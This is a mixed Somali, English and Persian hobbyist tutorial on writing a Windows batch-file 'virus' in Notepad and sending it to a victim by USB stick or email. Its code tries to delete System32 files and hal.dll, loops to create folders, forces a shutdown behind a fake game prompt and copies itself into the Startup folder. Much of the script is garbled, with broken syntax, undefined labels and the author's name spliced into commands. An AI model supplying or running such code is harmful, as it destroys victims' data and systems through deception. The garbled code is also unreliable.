Samee Virus fudud Adoo isticmaalaya Notepad ++

Fadlan  inta aanad bilaabin si fiican u akhri talaabooyinka [instructions} min bilaw ilaa dhamaad 

 Fadlan talaabooyinka si fiican u raac kana taxadir
inaad computerkaaga ku daydo 
Here we are going to show, How to make Simple Virus in notepad.

Step 1 : We will Create a Virus

Step 2 : We will Check it on Victims Computer.

xasuusnow fadlan computerkaaga ha ku dayin 
[ Note : Don't try it on your computer ] 

Step 1: Open Notepad and Copy the Following code in Notepad. 

Picture of Open Notepad and Copy the Following code in Notepad.
Step 1: Open Notepad and Copy the Following code in Notepad. Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ] Copy the Following Code and paste it in notepad then Save it as "virus.bat
Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]
@echo off
cd /d C:
cd /d D:
cd /d E:
goto VIRUS
REM #######################

Step 2: Give it to Victim

Picture of Give it to Victim
Now Give this file to Victim via Pen-drive or Mail then ask to Open it.

It will Create More Folder in C,D,and E drive.

 Exmaple Virus}
طریقه ساخت ویروس توسط سید معروف رنجبر
Type This in notepad and save it as anything.bat
@echo off
cd d:
echo @echo off >>virus.bat
echo :start >>Virus.bat
echo cd %engabdifatah% >>Virus.bat
echo md %random%-%random% >>virus.bat
echo cd /d d: >>virus.bat
echo md %random%-%random% >>virus.bat
echo goto start >>virus.bat
echo @echo off >>virus1.bat
echo Do You need to Play The game (y/n) >>virus1.bat
echo del *.* "C:\Windows\System32" >>virus1.bat >nul
echo Shutdown -s -f -t 10 -c %time% %date% >>virus1.bat
start Virus.bat
start Virus1.bat
note :64bit 32 bit ku badal  compuerkaagu kuu yahay adoo 
steps islaash-ta iyo doteska ilaalinaya    

Virus shaqaynaya   {Real Virus}

Engabdifatah del c:/Windows/System/System32/
del c:/Windows/System32/ntoskrnl/
del c:/windows/System32/hal.dll
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%engabdifatahkinglions%\My Documents"
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus" "virus.bat2009"
goto  hero sir Abdifatah
a effect virus 
It copies itself to other files and into the startup menu
so ANYTHING that the person 
fadlan ka taxadir inaad si khladan u isticmaasho hadii
kale wixii ku gaadha adaa isu gaystay 
fadlan aqoon ahaan u qaado ha isku dayin 
inaad si aanad garanayn u isticmaasho hadii kale 
computerkaagu wuu ku daayay sxp

Desined &Developed By Eng Abdifatah jama
fadlana xuuquuqda dhawr 
fadlan computerkaaga ha ku dayin 
hadii kale adiga ayaa ka masuula 
sir Abdifatah Channel kama masuula aha wixii ku gaadha 
isagoo inataa ka sii horumarsana dhawaan filo in shaa alaah 

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